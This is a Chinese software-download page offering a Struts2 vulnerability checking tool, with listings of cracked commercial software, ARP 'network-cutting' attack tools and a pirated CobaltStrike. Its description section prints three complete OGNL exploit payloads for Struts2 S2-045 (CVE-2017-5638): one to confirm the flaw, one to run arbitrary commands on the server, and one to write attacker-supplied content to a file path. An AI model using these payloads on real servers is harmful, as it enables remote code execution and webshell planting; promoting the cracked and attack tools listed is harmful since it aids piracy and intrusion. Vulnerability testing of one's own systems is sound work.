奔圖 Pantum M6202W 多功能一體打印機(jī)驅(qū)動(dòng) V1.14.35 官方免費(fèi)版
45.9MB / 05-09
奔圖 Pantum M6200NW Series 多功能一體打印機(jī)驅(qū)動(dòng) v1.13.46 官
45.9MB / 05-09
AppScan 9.0.3.6 簡(jiǎn)體中文特別版(附破解補(bǔ)丁+安裝破解教程)
1.08GB / 09-26
arpspoof(arp斷網(wǎng)攻擊軟件) v1.0.0.1 中文免費(fèi)綠色版
1.48MB / 08-19
輿情狗(網(wǎng)絡(luò)輿情實(shí)時(shí)監(jiān)測(cè)軟件) v1.0.0 免費(fèi)安裝版
2.44MB / 09-23
-
滲透測(cè)試軟件Burp Suite Professional v2025.2.4 免費(fèi)版 網(wǎng)絡(luò)安全 / 565MB
-
-
藍(lán)鯨隱私保護(hù) V1.6624.1185.1202 官方安裝版 網(wǎng)絡(luò)安全 / 43.6MB
-
滲透測(cè)試工具Burp Suite Professional v2024.8.3 多語言免費(fèi)激活 網(wǎng)絡(luò)安全 / 542MB
-
Abelssoft BankingBrowser(網(wǎng)銀安全保護(hù)軟件) 2025 v7.0.56240 網(wǎng)絡(luò)安全 / 121MB
-
-
-
阿里云SDP客戶端電腦版 v3.15 官方安裝版 網(wǎng)絡(luò)安全 / 87.1MB
-
-
360安全衛(wèi)士最新版 v13.0.0.2209 官方免費(fèi)安裝版 網(wǎng)絡(luò)安全 / 112MB
詳情介紹
Struts2是一個(gè)基于MVC設(shè)計(jì)模式的Web應(yīng)用框架,但2存在遠(yuǎn)程代碼執(zhí)行的漏洞,現(xiàn)在Struts2漏洞檢測(cè)工具2017版增加S2-046,官方發(fā)布S2-046和S2-045漏洞引發(fā)原因一樣,只是利用漏洞的位置發(fā)生了變化,S2-046方式可能繞過部分WAF防護(hù),存在S2-045就存在S2-046。需要此款Struts2漏洞檢測(cè)工具的朋友可下載試試!
當(dāng)Struts2開啟devMode模式時(shí),將導(dǎo)致嚴(yán)重遠(yuǎn)程代碼執(zhí)行漏洞。如果WebService啟動(dòng)權(quán)限為最高權(quán)限時(shí),可遠(yuǎn)程執(zhí)行任意命令,包括關(guān)機(jī)、建立新用戶、以及刪除服務(wù)器上所有文件等等。
支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-4316等漏洞檢測(cè)!
Apache Struts2存在遠(yuǎn)程代碼執(zhí)行的高危漏洞(S2-057/CVE-2018-11776),該漏洞由Semmle Security Research team的安全研究員Man YueMo發(fā)現(xiàn)。該漏洞是由于在Struts2開發(fā)框架中使用namespace功能定義XML配置時(shí),namespace值未被設(shè)置且在上層動(dòng)作配置(Action Configuration)中未設(shè)置或用通配符namespace,可能導(dǎo)致遠(yuǎn)程代碼執(zhí)行。同理,url標(biāo)簽未設(shè)置value和action值且上層動(dòng)作未設(shè)置或用通配符namespace時(shí)也可能導(dǎo)致遠(yuǎn)程代碼執(zhí)行!
相關(guān)exp:
S2-045:
1、驗(yàn)證漏洞,修改Content-Type,返回內(nèi)容為“webpath”代表存在漏洞。
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).
(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}
2、執(zhí)行命令
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new
java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).
(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).
(#res.getWriter().close()).(#s.close())}
3、上傳文件:
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new
java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).
(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).
(#res.getWriter().close())}
下載地址
人氣軟件
捍衛(wèi)者內(nèi)網(wǎng)安全管理系統(tǒng) 6.7.3 官方安裝版
局域網(wǎng)終結(jié)者2017(arp斷網(wǎng)攻擊工具) V2.0.1.2 最新綠色免費(fèi)版
局域網(wǎng)網(wǎng)速控制器 v4.25 破解去廣告版 hziming作品
滲透測(cè)試軟件Burp Suite Professional v2025.2.4 免費(fèi)版
360安全衛(wèi)士領(lǐng)航版 v13.0.0.2209 官方免費(fèi)安裝版
CA證書 聯(lián)想網(wǎng)御CA證書
瑞星卡卡安全助手 V6.2.5.9 官方安裝中文版
滲透利器CobaltStrike 4.0 免費(fèi)漢化版(含原版+補(bǔ)丁)
大勢(shì)至局域網(wǎng)網(wǎng)絡(luò)準(zhǔn)入控制軟件 v8.0 官方中文安裝版
360安全衛(wèi)士最新版 v13.0.0.2209 官方免費(fèi)安裝版
相關(guān)文章
-
小米電腦管家 v5.2.0.207 官方安裝版
小米電腦管家是一款優(yōu)秀的系統(tǒng)優(yōu)化和維護(hù)軟件不僅擁有簡(jiǎn)潔直觀的用戶界面,而且還具備安全防護(hù)功能,能夠?qū)崟r(shí)監(jiān)控電腦的安全狀態(tài),防止惡意軟件和病毒的入侵,同時(shí)也提供了...
-
藍(lán)鯨隱私保護(hù) V1.6624.1185.1202 官方安裝版
藍(lán)鯨隱私保護(hù)支持清理眾多軟件隱私保護(hù)用戶的安全等,本站提供的是這款軟件安裝包...
-
滲透測(cè)試軟件Burp Suite v2023.11.1.3 永不過期免費(fèi)中文版
burpsuite2023是一款非常不錯(cuò)的安全防護(hù)工具,該軟件可以幫助各位用戶詳細(xì)的了解并掌握電腦中的網(wǎng)絡(luò)信息安全,歡迎需要的朋友下載使用...
-
隱私安全保護(hù)軟件 Cyber Privacy Suite 破解補(bǔ)丁 v4.0.4 附激活教程
一款安全性極高的網(wǎng)絡(luò)安全軟件,它可以有效的防止各種程序和網(wǎng)頁的惡意攻擊或者跟蹤,主動(dòng)識(shí)別您的信息容易受到攻擊或暴露的地方,讓你的隱私得到保護(hù)。...
-
Anti DDoS Guardian破解補(bǔ)丁 v6.1.0.0 免費(fèi)安裝版 附激活教程
Anti DDoS Guardian 激活補(bǔ)丁分享!Anti DDoS Guardian是性能卓越的抗DDoS攻擊軟件的Windows服務(wù)器。它停止緩慢的HTTP Get和郵政攻擊, 7層攻擊, slowloris攻擊, OWASP的...
-
滲透測(cè)試工具Burp Suite Professional v2024.8.3 多語言免費(fèi)激活版
Burp Suite Professional 是一套用于測(cè)試 web 安全性的高級(jí)工具集 ,使用您將獲得更快、更可靠的安全測(cè)試。歡迎需要的朋友下載使用...
下載聲明
☉ 解壓密碼:www.dbjr.com.cn 就是本站主域名,希望大家看清楚,[ 分享碼的獲取方法 ]可以參考這篇文章
☉ 推薦使用 [ 迅雷 ] 下載,使用 [ WinRAR v5 ] 以上版本解壓本站軟件。
☉ 如果這個(gè)軟件總是不能下載的請(qǐng)?jiān)谠u(píng)論中留言,我們會(huì)盡快修復(fù),謝謝!
☉ 下載本站資源,如果服務(wù)器暫不能下載請(qǐng)過一段時(shí)間重試!或者多試試幾個(gè)下載地址
☉ 如果遇到什么問題,請(qǐng)?jiān)u論留言,我們定會(huì)解決問題,謝謝大家支持!
☉ 本站提供的一些商業(yè)軟件是供學(xué)習(xí)研究之用,如用于商業(yè)用途,請(qǐng)購買正版。
☉ 本站提供的Struts2漏洞檢查工具2018版(S2-045/S2-057) v2.0 最新綠色版(含POC和修復(fù)補(bǔ)丁包)資源來源互聯(lián)網(wǎng),版權(quán)歸該下載資源的合法擁有者所有。